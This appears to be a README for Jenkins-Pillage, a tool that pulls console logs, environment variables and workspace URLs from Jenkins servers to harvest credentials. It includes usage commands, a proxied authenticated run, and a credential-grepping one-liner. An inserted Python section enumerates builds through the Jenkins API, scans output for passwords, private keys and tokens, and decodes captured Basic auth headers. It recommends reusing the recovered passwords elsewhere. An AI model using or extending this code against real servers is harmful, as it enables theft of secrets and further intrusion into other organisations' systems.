Jenkins-Pillage: automatically gathering sensitive information from exposed Jenkins servers

Jenkins-Pillage

This tool attempts to pull the console output, environment variables, and workspaces associated with Jenkins builds. It works against both unauthenticated servers and authenticated ones, given credentials.

These locations typically hold plenty of sensitive information, and this tool automates pillaging it. Credentials, API endpoints, private keys, and much more have been gathered with Jenkins-Pillage.

Download

git clone https://github.com/DolosGroup/Jenkins-Pillage.git

Use 


Example

Easy mode:

$ ./jenkins-pillage.py -a https://jenkins.example.com
Getting a list of all build URLs
https://jenkins.example.com/job/Application0/4
https://jenkins.example.com/job/Application1/6
Attempting: https://jenkins.example.com/job/Application0/4
-- FOUND CONSOLE OUTPUT
Attempting: https://jenkins.example.com/job/Application1/6
-- FOUND CONSOLE OUTPUT
-- FOUND ENV VARS
...

List all build URLs recursed from a top-level URL:

$ ./jenkins-pillage.py -l https://jenkins.example.com
https://jenkins.example.com/job/Application0/4
https://jenkins.example.com/job/Application1/6
...

Pull the console output, workspace zip URL, and environment variables of one of the builds listed above:

$ ./jenkins-pillage.py -b https://jenkins.example.com/job/Application0/4
Attempting: https://jenkins.example.com/job/Application0/4
-- FOUND CONSOLE OUTPUT
-- FOUND ENV VARS
-- FOUND WORKSPACE ZIP URL

The same, but routed through an SSH SOCKS proxy (for example one opened with ssh -D 1080) against a server that requires credentials:

$ export all_proxy=socks4a://localhost:1080
$ ./jenkins-pillage.py -b https://jenkins.example.com/job/Application0/4 -u admin -p Password1
Attempting: https://jenkins.example.com/job/Application0/4
-- FOUND CONSOLE OUTPUT
-- FOUND ENV VARS
-- FOUND WORKSPACE ZIP URL

The files are pulled down to the current directory. The workspace zip itself is not downloaded; only its URL is written to a file, because many of the workspace zips I've seen can easily fill up a hard drive. Once the files are downloaded, grep to your heart's delight:

$ egrep -i 'password|Authorization.*Basic|sqlplus|<other_creds_or_commands>' *
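As an added example (not Jenkins-Pillage's own code, and not from the page), the Python below sketches the same workflow end to end: walk the Jenkins JSON API to list build URLs the way -l does, derive the per-build endpoints that -b pulls, and scan the pulled console output for the kinds of credentials the egrep above looks for. It assumes Jenkins' standard api/json tree query, the consoleText endpoint, the EnvInject plugin's injectedEnvVars/api/json endpoint, and the ws/*zip*/workspace.zip workspace download. The job names, URLs and console lines are constructed samples, and the HTTP fetch is passed in as a callable so the code runs offline and so an authenticated or proxied client can be plugged in.

```python
"""Added example, not Jenkins-Pillage's own code: enumerate builds through the
Jenkins JSON API, derive the per-build endpoints the tool pulls, and scan the
pulled console output for credentials.  Runs offline on constructed samples."""
import base64
import json
import re

# Constructed sample of GET <jenkins>/api/json?tree=jobs[name,url,builds[number,url],jobs[...]]
# Folders and multibranch projects nest further "jobs"; leaf jobs carry "builds".
SAMPLE_API_JSON = json.dumps({"jobs": [
    {"name": "Application0", "url": "https://jenkins.example.com/job/Application0/",
     "builds": [{"number": 4, "url": "https://jenkins.example.com/job/Application0/4/"}]},
    {"name": "team", "url": "https://jenkins.example.com/job/team/",  # a folder
     "jobs": [{"name": "Application1",
               "url": "https://jenkins.example.com/job/team/job/Application1/",
               "builds": [
                   {"number": 6, "url": "https://jenkins.example.com/job/team/job/Application1/6/"},
                   {"number": 5, "url": "https://jenkins.example.com/job/team/job/Application1/5/"}]}]},
]})

# Constructed console output of the kind a careless build leaks (all values fake).
SAMPLE_CONSOLE = """\
Started by user anonymous
Building in workspace /var/lib/jenkins/workspace/Application0
[Application0] $ /bin/sh -xe /tmp/jenkins123.sh
+ export DB_PASSWORD=s3cr3t-db-pass
+ curl -s -u deploy:Hunter2 https://api.example.com/v1/deploy
> Authorization: Basic ZGVwbG95Okh1bnRlcjI=
+ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAfakefakefake
-----END RSA PRIVATE KEY-----
Finished: SUCCESS
"""

def list_build_urls(api_json_text):
    """Walk the (folder-nested) job tree and return every build URL, like -l."""
    def walk(node):
        for job in node.get("jobs", []):
            yield from walk(job)                  # folders / multibranch: recurse
            for build in job.get("builds", []):
                yield build["url"]
    return list(walk(json.loads(api_json_text)))

def build_endpoints(build_url):
    """Per-build endpoints: console text, EnvInject env vars, workspace zip."""
    base = build_url if build_url.endswith("/") else build_url + "/"
    job_url = base.rsplit("/", 2)[0] + "/"       # drop the trailing build number
    return {
        "console": base + "consoleText",
        "env": base + "injectedEnvVars/api/json",  # present only with EnvInject
        "workspace_zip": job_url + "ws/*zip*/workspace.zip",
    }

def pillage_build(build_url, fetch):
    """Mirror the tool's per-build pull (-b).  `fetch(url)` is whatever HTTP
    client you use (authenticated, proxied); it returns the body as text, or
    None on 403/404.  The workspace zip is kept as a URL only: they can be huge."""
    endpoints = build_endpoints(build_url)
    found = {}
    for name in ("console", "env"):
        body = fetch(endpoints[name])
        if body is not None:
            found[name] = body
    found["workspace_zip_url"] = endpoints["workspace_zip"]
    return found

SECRET_PATTERNS = {   # what the README's egrep looks for, plus a few more
    "password_assignment": re.compile(r"password\s*[=:]\s*\S+", re.I),
    "basic_auth_header": re.compile(r"authorization:\s*basic\s+([A-Za-z0-9+/=]+)", re.I),
    "curl_user_flag": re.compile(r"\bcurl\b.*?\s(?:-u|--user)\s+\S+"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "api_key_or_token": re.compile(r"(?:api[_-]?key|token)\s*[=:]\s*\S+", re.I),
}

def find_secrets(console_text):
    """Return (line_no, pattern_name, matched_text) for every hit, in file order."""
    hits = []
    for line_no, line in enumerate(console_text.splitlines(), 1):
        for name, pattern in SECRET_PATTERNS.items():
            match = pattern.search(line)
            if match:
                hits.append((line_no, name, match.group(0)))
    return hits

def decode_basic_auth(line):
    """Recover user:password from a captured 'Authorization: Basic ...' line."""
    match = SECRET_PATTERNS["basic_auth_header"].search(line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:            # binascii.Error is a ValueError subclass
        return None

if __name__ == "__main__":
    for url in list_build_urls(SAMPLE_API_JSON):
        print(url)
    for line_no, name, text in find_secrets(SAMPLE_CONSOLE):
        print(f"{line_no}: {name}: {text}")
    print(decode_basic_auth("Authorization: Basic ZGVwbG95Okh1bnRlcjI="))
```

The fetch callable is the seam for the -u/-p and all_proxy cases: hand pillage_build a function that adds an HTTP Basic Authorization header and speaks SOCKS, and the enumeration and scanning code stays the same. A Basic header found in console output is worth decoding on the spot, since the user:password pair often works against more than the one API the build called.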

Copyright (C) 2019 Dolos Group

Source: https://github.com/DolosGroup/